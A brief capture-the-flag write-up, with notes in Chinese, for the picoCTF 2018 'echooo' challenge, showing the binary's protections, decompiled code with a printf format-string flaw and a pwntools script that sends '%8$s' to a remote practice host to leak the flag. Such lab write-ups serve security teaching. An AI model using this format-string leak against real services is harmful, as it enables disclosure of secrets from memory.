picoctf_2018_echooo
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8047000)
32位,只开了nx
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
__gid_t v3; // [esp+14h] [ebp-94h]
FILE *stream; // [esp+18h] [ebp-90h]
char s[64]; // [esp+1Ch] [ebp-8Ch] BYREF
char v6[64]; // [esp+5Ch] [ebp-4Ch] BYREF
unsigned int v7; // [esp+9Ch] [ebp-Ch]
v7 = __readgsdword(0x14u);
setvbuf(stdout, 0, 2, 0);
v3 = getegid();
setresgid(v3, v3, v3);
memset(s, 0, sizeof(s));
memset(s, 0, sizeof(s));
puts("Time to learn about Format Strings!");
puts("We will evaluate any format string you give us with printf().");
puts("See if you can get the flag!");
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
fgets(v6, 64, stream);
while ( 1 )
{
printf("> ");
fgets(s, 64, stdin);
printf(s);
}
}
把flag读在了栈上
并且给出了格式化字符串漏洞
本地调试,写一个flag.txt文件
from pwn import*
from Yapack import *
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26727,"./pwn",10)
#debug("b *0x804874f")
sla(b'> ',b"%8$s")
ia()